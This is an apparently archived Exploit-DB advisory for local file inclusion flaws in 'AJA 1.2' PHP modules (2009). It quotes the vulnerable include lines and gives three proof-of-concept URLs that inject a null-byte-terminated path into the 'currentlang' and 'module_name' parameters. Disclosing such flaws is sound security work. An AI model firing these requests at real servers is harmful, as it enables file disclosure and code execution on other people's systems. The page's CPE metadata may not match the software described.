multi local file include

vendor:

AJA 1.2

by:

ahmadbady

7.5

CVSS

HIGH

Local File Inclusion

CWE

Product Name: AJA 1.2

Affected Version From: AJA 1.2

Affected Version To: AJA 1.2

Patch Exists: NO

Related CWE: N/A

CPE: a:ajaxplorer:ajaxplorer:1.2

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

AJA 1.2 is vulnerable to multiple local file inclusion vulnerabilities. The vulnerabilities exist due to insufficient sanitization of user-supplied input to the 'currentlang' and 'module_name' parameters in the 'case.php' and 'FANCYNLOptions.php' scripts respectively. An attacker can exploit these vulnerabilities to include arbitrary local files, resulting in the disclosure of sensitive information, and the execution of arbitrary code.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.

Source

Exploit-DB raw data:

                      -------------:multi local file include:------------
---------------
script:AJA 1.2
   
------------------------------------------------------------------
download from:http://www.magtrb.com/en/modules.php?name=Downloads&op=getit&lid=6
   
------------------------------------------------------------------

........................................................
vul1: \modules\Contact_Plus\admin\case.php line 14:

if (!stristr($_SERVER['SCRIPT_NAME'], "".$admin_file.".php")) { die ("Access Denied"); }
$module_name = "Contact_Plus";
include_once("modules/$module_name/admin/language/lang-".$currentlang.".php"); line 14

...............

vul2: /modules/Fancy_NewsLetter/admin/includes/FANCYNLOptions.php line 2:

require_once('modules/'.$module_name.'/admin/includes/Modules/Banners.php'); line2
...............

vul3: /modules/Reviews/admin/case.php line 14:

if (!eregi("".$admin_file.".php", $_SERVER['SCRIPT_NAME'])) { die ("Access Denied"); }
$module_name = "Reviews";
include_once("modules/$module_name/admin/language/lang-".$currentlang.".php"); line 14

-----------------------------------------------------
-----------------------------------------------------

xpl:

http://127.0.0.1/path/modules/Contact_Plus/admin/case.php?currentlang=[Lfi]%00

http://127.0.0.1/path/modules/Fancy_NewsLetter/admin/includes/FANCYNLOptions.php?module_name=[Lfi]%00

http://127.0.0.1/path/modules/Reviews/admin/case.php?currentlang=[Lfi]%00

***************************************************
***************************************************
---------------------------------------------------
Author: ahmadbady [kivi_hacker666@yahoo.com]

from[iran-tehran]
---------------------------------------------------


# milw0rm.com [2009-02-02]